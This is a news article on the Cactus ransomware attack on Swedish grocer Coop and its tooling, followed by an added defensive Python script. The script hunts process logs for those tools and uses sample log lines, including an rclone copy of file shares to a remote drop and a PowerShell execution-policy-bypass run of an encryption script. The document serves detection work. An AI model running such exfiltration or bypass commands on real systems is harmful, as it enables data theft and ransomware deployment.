A cyberattack that is affecting stores in the county of Värmland is being handled by Coop, one of the biggest supermarket chains in Sweden.
A spokeswoman for the ransomware gang Cactus said that Coop Värmland was the intended victim of the attack, which they claimed to have launched on December 29.
Around 300,000 people in the county of Värmland collectively own Coop Värmland, which operates consumer cooperative-owned grocery stores across Sweden. 44 supermarkets and 17 additional smaller grocery stores are operated by the Värmland branch.
The company confirmed that a cyberattack against Coop Värmland took place. External experts were brought in as soon as it was detected, and intensive work began immediately, focused primarily on closing the vulnerabilities through which the intrusion had occurred, according to the spokesperson.
These vulnerabilities have been successfully addressed, according to the current assessment. Since the incident, work has been ongoing and has continued over the Christmas break.
The attack started on December 22, according to local news sources, when none of the Coop Värmland stores could accept credit or debit cards.
Although there is a temporary page on the Coop Värmland website confirming that they are dealing with a cyberattack, the stores are still open.
If customers have any questions, they should reach out to their closest store via Facebook, the company advised. Additional contact information is provided on the page in case customers have questions about the rewards program or specific orders.
Coop has encountered ransomware before. In 2021 it was affected by the massive ransomware attack on Kaseya, a vendor of remote management software.
That attack led to Coop having to close almost 800 stores around the nation.
The Cactus ransomware group did not disclose the volume of data taken or the size of the ransom demand.
Prior to this, the gang became well known for its attack on Americold, the world's largest publicly traded real estate investment trust specializing in temperature-controlled storage facilities.
Cybersecurity experts previously told BleepingComputer that Cactus first surfaced in March and that its primary method of gaining initial access to the networks of large corporations was exploiting flaws in VPN appliances.
Dragos, an incident response firm, added that it is becoming more common for industrial organizations to be targeted by Cactus ransomware attacks, which affect industrial control systems and the manufacturing and engineering industries.
Microsoft announced in December that the group is infecting victims with malware that is distributed through online advertisements.
Cactus Ransomware Gang Attacks Coop
Coop, which has about 800 stores nationwide, is one of the biggest grocery and retail suppliers in Sweden. The stores are co-owned by 29 consumer associations comprising 3.5 million members. All business surplus is either returned to the members or reinvested in the company, creating a cycle.
With over 21,000 directories’ worth of personal data at risk, the Cactus ransomware group claims to have breached Coop.
On their Tor leak site, the Cactus ransomware group listed Coop as one of its victims.
As evidence of a hack, threat actors have released ID cards.
The first company to reveal the effects of the supply chain ransomware attack that targeted Kaseya was the Swedish supermarket chain Coop in July 2021.
About 500 stores of the grocery chain Coop were forced to close due to a supply chain ransomware attack that targeted the Kaseya provider.
Even though Coop does not use Kaseya software itself, one of its software providers does, so the incident still affected it.
The Swedish MSP Visma, which oversees the payment systems for the supermarket chain, was the affected provider.
Visma acknowledged that the REvil ransomware was able to encrypt the systems of their customers due to the Kaseya cyberattack.
The threat actors behind the Cactus ransomware operation have been active since March 2023 and use a double-extortion model, although their data leak site had not yet been found at the time.
The ransomware strain stands out for using encryption to protect the ransomware binary, according to Kroll researchers.
Besides using PowerShell commands to enumerate endpoints, the Cactus ransomware uses the SoftPerfect Network Scanner (netscan) to search the network for additional targets. It also uses a modified version of the open-source PSnmap tool, and it identifies user accounts by looking up successful logins in Windows Event Viewer.
The Cactus ransomware uses Cobalt Strike and the proxy tool Chisel for post-exploitation operations and depends on several trustworthy tools (such as Splashtop, AnyDesk, and SuperOps RMM) to obtain remote access.
Once the malware has escalated privileges, the threat actors use a batch script to uninstall well-known antivirus products from the compromised machines.
Cactus uses the Rclone tool to exfiltrate data, and it automates the encryption process with TotalExec, a PowerShell script previously used by the operators of the BlackBasta ransomware.
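The tooling described in the preceding paragraphs (netscan, PSnmap, AnyDesk, Splashtop, SuperOps RMM, Chisel, Rclone, TotalExec) is largely off-the-shelf, so a practical defensive starting point is to hunt for those names in process-creation telemetry and escalate when one host shows tools from several phases of the chain rather than a lone remote-access client. The script below is an added example, not code from the article or from any of the organizations it mentions; the log format (Sysmon-style key=value records), the hostnames and the sample lines are all constructed for illustration, and the `WATCHLIST` groupings are an assumption drawn from how the article describes each tool's role.

```python
"""Hunt process-creation records for the tools the article attributes to Cactus.

Assumptions (constructed for this example): one record per line, Sysmon-style
key=value fields, values containing spaces wrapped in double quotes.
"""
import re
from collections import defaultdict

# Tools named in the article, keyed by the phase the article describes them in.
# Matching is on lowercase substrings of the Image and CommandLine fields.
# Presence alone is not proof of compromise: Rclone, AnyDesk and Splashtop all
# have legitimate uses. Cobalt Strike is deliberately absent because its
# beacons are not reliably identifiable by process name.
WATCHLIST = {
    "discovery": ("netscan", "psnmap"),
    "remote_access": ("anydesk", "splashtop", "superops"),
    "post_exploitation": ("chisel",),
    "exfiltration": ("rclone",),
    "encryption": ("totalexec",),
}

# Constructed sample telemetry (hostnames, users and paths are made up).
SAMPLE_LOG = """\
Host=WS-01 Image=C:\\Windows\\System32\\svchost.exe CommandLine="svchost.exe -k netsvcs" User="NT AUTHORITY\\SYSTEM"
Host=WS-01 Image=C:\\Tools\\netscan.exe CommandLine="netscan.exe /range:10.0.0.0/24" User=CORP\\jdoe
Host=WS-01 Image=C:\\Users\\jdoe\\AppData\\Local\\Temp\\rclone.exe CommandLine="rclone.exe copy C:\\Shares remote:drop" User=CORP\\jdoe
Host=WS-02 Image="C:\\Program Files\\AnyDesk\\AnyDesk.exe" CommandLine="AnyDesk.exe --service" User=CORP\\helpdesk
Host=WS-01 Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe CommandLine="powershell.exe -ep bypass -f C:\\ProgramData\\TotalExec.ps1" User=CORP\\jdoe
"""

# key=value where the value is either a quoted string or a run of non-spaces
FIELD_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_record(line):
    """Turn one key=value record into a dict; quoted values keep their spaces."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        fields[m.group(1)] = m.group(2) if m.group(2) is not None else m.group(3)
    return fields


def match_phases(record):
    """Return (phase, indicator) pairs whose indicator appears in Image or CommandLine."""
    haystack = (record.get("Image", "") + " " + record.get("CommandLine", "")).lower()
    return [(phase, ind) for phase, inds in WATCHLIST.items() for ind in inds if ind in haystack]


def hunt(log_text):
    """Group hits per host: {host: {phase: [indicator, ...]}}."""
    hits = defaultdict(lambda: defaultdict(list))
    for line in log_text.splitlines():
        record = parse_record(line)
        for phase, ind in match_phases(record):
            hits[record.get("Host", "?")][phase].append(ind)
    return {host: dict(phases) for host, phases in hits.items()}


def triage(hits, min_phases=2):
    """Escalate hosts where tools from at least `min_phases` distinct phases appear.

    One remote-access client on its own is usually IT at work; discovery plus
    exfiltration plus an encryption script on the same host is the chain the
    article describes and warrants immediate response.
    """
    return sorted(host for host, phases in hits.items() if len(phases) >= min_phases)


if __name__ == "__main__":
    findings = hunt(SAMPLE_LOG)
    for host, phases in findings.items():
        print(host, phases)
    print("escalate:", triage(findings))
```

Run against real telemetry by feeding `hunt()` the exported records instead of `SAMPLE_LOG`; the `min_phases` threshold is the knob that trades alert volume for sensitivity, and the indicator lists should be extended with whatever your own environment's approved remote-access and sync tools are, so that the sanctioned ones can be allow-listed by path or signer rather than by name.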